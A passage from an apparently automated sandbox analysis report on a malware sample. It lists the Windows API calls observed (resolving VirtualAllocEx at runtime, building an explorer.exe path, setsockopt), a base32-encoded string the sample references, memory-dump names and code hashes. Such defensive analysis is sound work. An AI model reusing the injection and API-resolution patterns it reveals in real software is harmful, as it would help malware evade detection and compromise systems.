      • lstrcat.KERNEL32(?,\explorer.exe), ref: 004054E7
      • lstrcpy.KERNEL32(?,?), ref: 0040550C
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: DirectorySystemlstrcatlstrcpy
      • String ID: \explorer.exe
      • API String ID: 2630975639-1502772786
      • Opcode ID: 823721c289e2eba20add7c8bdeb04609ff25960a1b4460d0f14d2c567736ea70
      • Instruction ID: cf47fa7405b68876a61fa54a680553e6956fd93f1a60e47cd12e063c3e371ca6
      • Opcode Fuzzy Hash: 823721c289e2eba20add7c8bdeb04609ff25960a1b4460d0f14d2c567736ea70
      • Instruction Fuzzy Hash: 09F059712402106BD738D728ED91BEB77D8AFC8700F400439BACAE32A0D6798494CA86
      APIs
      • LoadLibraryA.KERNEL32(kernel32.dll,0040B273,0040B114,14BEE2C9,0040B0B7,000000AC,487638D3,0040B0C1,487638D3,004048BD,?,00000000,EDC,00000041), ref: 00407212
      • GetProcAddress.KERNEL32(CD4C01B8,SetFilePointer,?,00000000,EDC,00000041), ref: 00407228
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: AddressLibraryLoadProc
      • String ID: SetFilePointer$kernel32.dll
      • API String ID: 2574300362-4212435992
      • Opcode ID: 47063d3ea6f2ae20e95bcafe6dd272a25eee96bbf78a12eefe1d0fbbba9612ce
      • Instruction ID: 92d5dbadcdb673f041f62a2f547e8e2a008e0ea9c6cffdde93753ed389d37c6a
      • Opcode Fuzzy Hash: 47063d3ea6f2ae20e95bcafe6dd272a25eee96bbf78a12eefe1d0fbbba9612ce
      • Instruction Fuzzy Hash: 18D0C9B09882409BD600ABA4EF095063BA5B6063103100475EA06BA3E5D27424568A0E
      APIs
      • GetModuleHandleA.KERNEL32(Kernel32.dll,VirtualAllocEx,00000000,0040205D), ref: 00404C1D
      • GetProcAddress.KERNEL32(00000000), ref: 00404C24
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: AddressHandleModuleProc
      • String ID: Kernel32.dll$VirtualAllocEx
      • API String ID: 1646373207-2312931118
      • Opcode ID: bc67872528889f18fc269d71765628177d41be209ebb95b5a36184931c2f64ff
      • Instruction ID: 1f5087a167780450935ce27456e9c382f66f6d31a4a0d8f7e720613a16c3e223
      • Opcode Fuzzy Hash: bc67872528889f18fc269d71765628177d41be209ebb95b5a36184931c2f64ff
      • Instruction Fuzzy Hash: 90C08CB12802205FC6507BA4BE0DA963E58EA04B11312083AF0C6F2290C9B40850879A
      APIs
      Strings
      • O5WGU2RYGMXDGMZSGIXG64THHI4DG===, xrefs: 00402FDB
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: setsockopt
      • String ID: O5WGU2RYGMXDGMZSGIXG64THHI4DG===
      • API String ID: 3981526788-1710454822
      • Opcode ID: f02676a5f20a0448794ca7539439c6700ce440e1f56ecd6caa4025d4a2f7fda6
      • Instruction ID: dab42955ede70b45eea24b3139e0784c7e83a395bc8883f859031c1f01a4b626
      • Opcode Fuzzy Hash: f02676a5f20a0448794ca7539439c6700ce440e1f56ecd6caa4025d4a2f7fda6
      • Instruction Fuzzy Hash: CB118F725083019FE310DF1DCC41A9BBBE8FFC8714F44496EF595A6291E3B0D6088E92